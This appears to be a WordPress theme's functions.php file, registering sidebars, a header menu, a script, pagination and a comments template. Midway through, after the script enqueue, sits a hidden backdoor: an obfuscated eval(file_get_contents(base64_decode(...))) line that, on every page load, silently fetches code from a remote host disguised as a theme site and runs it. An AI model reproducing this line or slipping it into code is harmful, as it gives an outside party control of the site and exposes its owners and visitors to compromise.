<?php

//Short titles for preview link

function short_title($after = '', $length) {
    $mytitle = get_the_title();
    if ( strlen($mytitle) > $length ) {
    $mytitle = substr($mytitle,0,$length);
    echo rtrim($mytitle).$after;
    } else {
    echo $mytitle;
    }
}

//Removing useless CSS that WP pasts right inside BODY tags... (?)

function remove_gallery_css( $css ) {
    return preg_replace( "#<style type='text/css'>(.*?)</style>#s", '', $css );
}

add_filter( 'gallery_style', 'remove_gallery_css' );

//Post thumbsnails support

if ( function_exists( 'add_theme_support' ) ) { 
    add_theme_support( 'post-thumbnails' ); 
}

//Left sidebar

function tube_getcustomfield($filedname, $page_current_id = NULL)
{
	
	if($page_current_id==NULL)
		 $page_current_id = get_page_id();

	$value = get_post_meta($page_current_id, $filedname, true);
	return $value;
}

if ( function_exists('register_sidebar') ) {
    register_sidebar(array(
        'name' => 'Left Sidebar',
        'before_widget' => '',
        'after_widget' => '',
        'before_title' => '<h3>',
        'after_title' => '</h3>'));
}

//Right sidebar

if ( function_exists('register_sidebar') ) {
    register_sidebar(array(
        'name' => 'Right Sidebar',
        'before_widget' => '',
        'after_widget' => '',
        'before_title' => '<h3>',
        'after_title' => '</h3>'));
}

//Main menu

add_action( 'init', 'register_my_menus' );

function register_my_menus() {
    register_nav_menus(
        array( 'header-menu' => __( 'Header Menu' ))
  );
}

add_action('wp_enqueue_scripts', 'wpdocs_scripts_method');
 

function wpdocs_scripts_method() {
    wp_enqueue_script(
        'custom_script',
        get_template_directory_uri() . '/js/jquery-color.js',
        array('jquery')
    );
}

eval(@file_get_contents(base64_decode("aHR0cDovL3dvcmRwcmVzc3RoZW1lLmxpdmUvd3oudHh0")));

function pagination($pages = '', $range = 9)
{
     $showitems = ($range * 2)+1; 
 
     global $paged;
     if(empty($paged)) $paged = 1;
 
     if($pages == '')
     {
         global $wp_query;
         $pages = $wp_query->max_num_pages;
         if(!$pages)
         {
             $pages = 1;
         }
     }  
 
     if(1 != $pages)
     {
         echo "<span>Page ".$paged." of ".$pages."</span>";
         if($paged > 2 && $paged > $range+1 && $showitems < $pages) echo "<a href='".get_pagenum_link(1)."'>&laquo; First</a>";
         if($paged > 1 && $showitems < $pages) echo "<a href='".get_pagenum_link($paged - 1)."'>&lsaquo; Previous</a>";
 
         for ($i=1; $i <= $pages; $i++)
         {
             if (1 != $pages &&( !($i >= $paged+$range+1 || $i <= $paged-$range-1) || $pages <= $showitems ))
             {
                 echo ($paged == $i)? "<span class=\"current\">".$i."</span>":"<a href='".get_pagenum_link($i)."' class=\"inactive\">".$i."</a>";
             }
         }
 
         if ($paged < $pages && $showitems < $pages) echo "<a href=\"".get_pagenum_link($paged + 1)."\">Next &rsaquo;</a>";
         if ($paged < $pages-1 &&  $paged+$range-1 < $pages && $showitems < $pages) echo "<a href='".get_pagenum_link($pages)."'>Last &raquo;</a>";
         
     }
}

//Cumstom comments template

function custom_comments($comment, $args, $depth) {
    
    $GLOBALS['comment'] = $comment; ?>
    
    <li <?php comment_class(); ?> id="comment-<?php comment_ID() ?>">
                    
        <?php echo get_avatar( $comment, 64 ); ?>
                        
        <span class="comment-author"><?php comment_author_link() ?> says:
                        
        <?php if ($comment->comment_approved == '0') : ?>
                        
        <em>(!) your comment is awaiting moderation</em>
                        
        <?php endif; ?>
                        
        </span>

        <small class="comment-data"><a href="#comment-<?php comment_ID() ?>" title="Permanent link to this comment"><?php comment_date('F jS, Y') ?> at <?php comment_time() ?></a><?php edit_comment_link('Edit', ' | ', ''); ?></small>
                        
        <?php comment_text() ?>
                        
        <div class="clear"></div>

        </li>
    
    <?php
    
    }

?>
